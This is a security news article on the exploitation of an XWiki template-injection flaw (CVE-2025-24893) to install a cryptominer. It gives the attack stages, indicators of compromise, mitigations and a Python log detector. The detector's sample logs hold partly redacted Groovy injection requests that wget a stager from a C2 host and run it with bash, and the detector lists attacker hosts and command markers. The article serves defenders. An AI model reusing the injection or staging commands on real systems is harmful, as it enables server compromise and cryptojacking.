Critical XWiki RCE Vulnerability Exploited to Deploy Cryptominers; Update Urged

Critical XWiki Vulnerability Exploited to Deploy Cryptocurrency Miners


A severe remote code execution (RCE) vulnerability in XWiki, a widely used open-source wiki platform, has been actively exploited to install cryptocurrency mining malware on compromised servers. This flaw, identified as CVE-2025-24893, enables unauthenticated attackers to inject malicious templates and execute arbitrary code, effectively bypassing all authentication mechanisms.

The exploitation of this vulnerability underscores the escalating threats to web applications, where real-world attacks often precede a listing in official sources such as the Cybersecurity and Infrastructure Security Agency's (CISA) Known Exploited Vulnerabilities (KEV) catalog.

VulnCheck, a firm specializing in vulnerability intelligence, detected this exploitation through their Canary network, which simulates vulnerable systems to identify attacks. Unlike earlier reports from Cyble, Shadow Server, and CrowdSec that noted mere exploit attempts, VulnCheck’s findings reveal a sophisticated two-stage attack originating from an IP address in Vietnam.

The vulnerability, added to VulnCheck's KEV in March 2025, involves template injection in XWiki's SolrSearch endpoint, allowing attackers to execute Groovy scripts for command execution. Its absence from CISA's KEV highlights how exploitation can surge before formal recognition, leaving organizations vulnerable.

The Two-Stage Exploitation Process

The attack unfolds in two distinct phases, separated by at least 20 minutes, likely to evade detection mechanisms.

1. Initial Phase: Attackers send a URL-encoded GET request to the SolrSearch endpoint, injecting an asynchronous Groovy payload that utilizes `wget` to download a script named `x640` from a command-and-control (C2) server located at 193.32.208.24:8080. This script is saved to `/tmp/11909` on the target system. The payload mimics legitimate browser traffic by using a Firefox user agent to blend in.

2. Secondary Phase: Approximately 20 minutes later, a second request executes the staged file by invoking `bash` on `/tmp/11909`. The downloader then fetches two additional scripts, `x521` and `x522`, piping them directly to `bash` for execution.

– `x521` Script: Creates directories in `/var/tmp`, downloads the coinminer binary `tcrond` from the same C2 server, and sets executable permissions.

– `x522` Script: Cleans the environment by terminating competing miners like `xmrig` and `kinsing`, clears history logs, and launches `tcrond` with a configuration pointing to `auto.c3pool.org` on port 80.

The miner, packed with UPX for obfuscation, uses a Monero wallet address for payouts, indicating a low-sophistication but persistent operation. All traffic traces back to 123.25.249.88, flagged in multiple AbuseIPDB reports for abusive activity.

Key Indicators

Defenders can use the following indicators to identify similar activities across networks. The exploitation leverages `transfer.sh` for hosting payloads, a common tactic in cryptojacking campaigns.

– IP Addresses:
  – 123.25.249.88 (Attacker, Vietnam)
  – 193.32.208.24 (C2 Server)

– File Hashes (SHA-1):
  – `tcrond` (packed): 0b907eee9a85d39f8f0d7c503cc1f84a71c4de10
  – `tcrond` (unpacked): 90d274c7600fbdca5fe035250d0baff20889ec2b
  – `x521`: de082aeb01d41dd81cfb79bc5bfa33453b0022ed
  – `x522`: 2abd6f68a24b0a5df5809276016e6b85c77e5f7f
  – `x640`: 5abc337dbc04fee7206956dad1e0b6d43921a868

– CVSS Score: 9.8 (Critical) – Unauthenticated RCE via template injection in XWiki versions prior to 15.10.6

– Affected Products: XWiki Enterprise, XWiki Standard; impacts web servers running vulnerable instances

Mitigation Measures

Organizations utilizing XWiki should take immediate action to mitigate this vulnerability:

1. Update XWiki: Upgrade to version 15.10.6 or later to patch the vulnerability.

2. Monitor Network Traffic: Keep an eye out for unusual `wget` traffic patterns that may indicate exploitation attempts.

3. Scan for Indicators of Compromise (IOCs): Regularly scan systems for the IOCs listed above to detect potential breaches.
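As an added example (not VulnCheck's or XWiki's code), the following script applies the two-stage pattern and the indicators above to web-server access logs: it flags SolrSearch requests carrying a Groovy template with a download command (stage 1) or an execution of a staged file (stage 2), then correlates them per source IP to surface the roughly 20-minute gap. The endpoint path, the combined log format and the sample lines are assumptions constructed for this example.

```python
import re
from datetime import datetime
from urllib.parse import unquote_plus

# Indicators from the article. The endpoint path and the log format
# (Apache/nginx "combined") are assumptions for this example.
C2_HOSTS = {"193.32.208.24", "123.25.249.88"}
SOLR_PATH = "/xwiki/bin/get/Main/SolrSearch"   # assumed endpoint path
DOWNLOAD_MARKERS = ("wget", "curl")            # stage 1: fetch the stager
EXEC_MARKERS = ("bash ", "sh ")                # stage 2: run the staged file

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def classify(line):
    """Return (src_ip, timestamp, stage) for a suspicious SolrSearch hit, else None."""
    m = LOG_RE.match(line)
    if not m or SOLR_PATH not in m["url"]:
        return None
    # Decode twice: injected templates are often URL-encoded more than once.
    query = unquote_plus(unquote_plus(m["url"])).lower()
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    if "groovy" not in query and not any(h in query for h in C2_HOSTS):
        return None                              # ordinary search, not template injection
    if any(k in query for k in DOWNLOAD_MARKERS):
        return m["ip"], ts, 1
    if any(k in query for k in EXEC_MARKERS) and "/tmp/" in query:
        return m["ip"], ts, 2
    return m["ip"], ts, 0                        # injection attempt of unknown stage

def find_two_stage(lines, min_gap_minutes=20):
    """Per source IP, report the stages seen and the gap from first stage-1 to first later stage-2 hit."""
    hits = {}
    for line in lines:
        hit = classify(line)
        if hit:
            ip, ts, stage = hit
            hits.setdefault(ip, {0: [], 1: [], 2: []})[stage].append(ts)
    alerts = []
    for ip, s in hits.items():
        later = [t for t in s[2] if s[1] and t > min(s[1])]
        gap = (min(later) - min(s[1])).total_seconds() / 60 if later else None
        alerts.append({"ip": ip, "stages": sorted(k for k, v in s.items() if v),
                       "gap_minutes": gap, "two_stage": gap is not None and gap >= min_gap_minutes})
    return alerts

# Constructed sample log lines (not real traffic); payload bodies are replaced with REDACTED.
SAMPLE_LOG = [
    '123.25.249.88 - - [15/Mar/2025:10:00:00 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text=%7B%7Bgroovy%7D%7DREDACTED%20wget%20http%3A%2F%2F193.32.208.24%3A8080%2Fx640%20-O%20%2Ftmp%2F11909 HTTP/1.1" 200 512 "-" "Mozilla/5.0 Firefox/115.0"',
    '10.0.0.5 - - [15/Mar/2025:10:05:12 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text=quarterly+report HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '123.25.249.88 - - [15/Mar/2025:10:21:30 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text=%7B%7Bgroovy%7D%7DREDACTED%20bash%20%2Ftmp%2F11909 HTTP/1.1" 200 512 "-" "Mozilla/5.0 Firefox/115.0"',
]
```

Running `find_two_stage(SAMPLE_LOG)` reports the attacker IP with stages [1, 2] and a 21.5-minute gap, while the benign search on the same endpoint is ignored.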

VulnCheck’s Canaries highlight the importance of proactive threat intelligence in bridging gaps left by delayed official listings.